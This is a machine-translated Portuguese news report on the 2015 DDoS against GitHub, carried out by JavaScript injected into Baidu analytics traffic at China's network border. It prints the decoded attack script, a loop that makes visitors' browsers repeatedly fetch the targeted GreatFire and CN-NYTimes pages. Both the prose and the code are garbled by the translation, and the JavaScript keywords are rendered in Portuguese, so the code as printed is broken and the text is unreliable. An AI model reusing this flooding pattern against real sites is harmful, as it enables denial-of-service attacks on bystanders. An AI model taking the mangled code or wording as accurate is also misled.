O JavaScript injetado usado para esmagar anti-Great Firewall of China GitHub projetos off-line

Servidores do GitHub estão sendo martelado pelo tráfego web de um exército de inconscientes ciber-soldados de infantaria.

Ela aparece quando milhares de pessoas visitam sites que veiculam anúncios e código de acompanhamento do Baidu - resposta da China ao Google - de fora do Reino Médio, gateways de rede na fronteira chinesa silenciosamente injetar uma função JavaScript em páginas desses sites.

Este código simples conecta repetidamente e furtivamente para GitHub.com a cada dois segundos, criando "uma quantidade extremamente grande de tráfego", disse o arrivista baseada em San Francisco.

A JS visa especificamente dois projetos GitHub hospedados - Greatfire e CN-NYTimes - que ajudam os cidadãos chineses contornar o Grande Firewall da China . O firewall bloqueia coisas como VPNs tráfego e censores web, escondendo informações sobre o massacre da Praça Tiananmen e assim por diante.

GitHub , disse na sexta-feira que as rajadas de tráfego, de forma eficaz uma seqüência de distribuídos de negação de serviço-ataques, estão causando interrupções intermitentes.

"Estamos cientes de que GitHub.com é intermitentemente indisponível para alguns usuários durante os DDoS em curso", disse o GitHub em uma atualização de status em 1549 UTC de hoje.

"O serviço para todos os usuários Restaurando enquanto desviando tráfego de ataque é a nossa prioridade número um. Temos implantado nossas defesas contra ataques volumétricos uma quantidade extremamente grande de tráfego. O desempenho é de estabilização."

Horas antes, o biz observou: "Estamos sob ataque DDoS contínua por mais de 24 horas O ataque está a evoluir, e estamos todas as mãos no convés atenuante.".

A interrupção ... atualizações de status do GitHub hoje

De acordo com um pesquisador de segurança na introspecção Labs , as solicitações HTTP para hm.baidu.com/h.js estão sendo sequestrado por passagens fronteiriças da China, o que inserir alguns JavaScript semi-ofuscado para atacar os repositórios GitHub acima mencionados. O script injetado parece com isso, uma vez descodificado:

document.write ("<script src =" http://ift.tt/1aR0QCs "> // <! [CDATA [
\ X3C / script> ");
! Window.jQuery && document.write ("<script src = 'http: //code.jquery.com/jquery-latest.js'> \ X3C / script>");
Startime = (new Date) .getTime ();
contagem var = 0;

função unixtime () {
    var a = new Date;
    retornar Date.UTC (a.getFullYear (), a.getMonth (), a.getDay (), a.getHours (), () a.getMinutes, a.getSeconds ()) / 1E3
}
url_array = ["http://ift.tt/1IEOAXq;, "http://ift.tt/1IEOzCO;];
NUM = url_array.length;

função r_send2 () {
    var a = unixtime ()% NUM;
    get (url_array [a])
}

função get (a) {
    var b;
    $ .ajax ({
        url: um,
        dataType: "script",
        timeout: 1E4,
        cache: 0,
        beforeSend: function () {
            requestTime = (new Date) .getTime ()
        },
        completar: function () {
            ResponseTime = (new Date) .getTime ();
            b = Math.floor (ResponseTime - requestTime);
            3E5> ResponseTime - Startime && (r_send (b), a contagem + = 1)
        }
    })
}

função r_send (a) {
    setTimeout ("r_send2 ()", a)
}
setTimeout ("r_send2 ()", 2E3);

O projeto Greatfire fornece links para espelhos hospedados em nuvem de sites - como a BBC e Blogger do Google - que o povo chinês pode usar para esquivar-se do Grande Firewall. Enquanto BBC.com é bloqueado , um cache de páginas da emissora em cloudfront.net não é, parece. CN-NYTimes espelha de forma semelhante ao New York Times.

"Um determinado dispositivo na fronteira da rede interna da China e da Internet seqüestrou as conexões HTTP entrou na China, substituiu alguns arquivos javascript do Baidu com os maliciosos que carregam [as páginas GitHub] a cada dois segundos," Anthr do Insight Labs '@ x escreveu.

"Em outras palavras, mesmo as pessoas fora da China estão a ser transformado em arma para atingir coisas que o governo chinês não gosta, por exemplo, a liberdade de expressão."

Enquanto não há nenhuma prova de que o governo chinês estava diretamente envolvido no assalto, outros pesquisadores, como Mikko Hypponen da F-Secure, notou que alguém, estado ou de outra forma, quer estes projectos silenciadas. ®

Os ataques DDoS contra Github e AWS (ambos feitos com tráfego Baidu sequestrado) são destinadas a silenciar o grande trabalho feito por GreatFireChina .

- Mikko Hypponen (mikko) 27 de março de 2015

via Alimentação (Feed)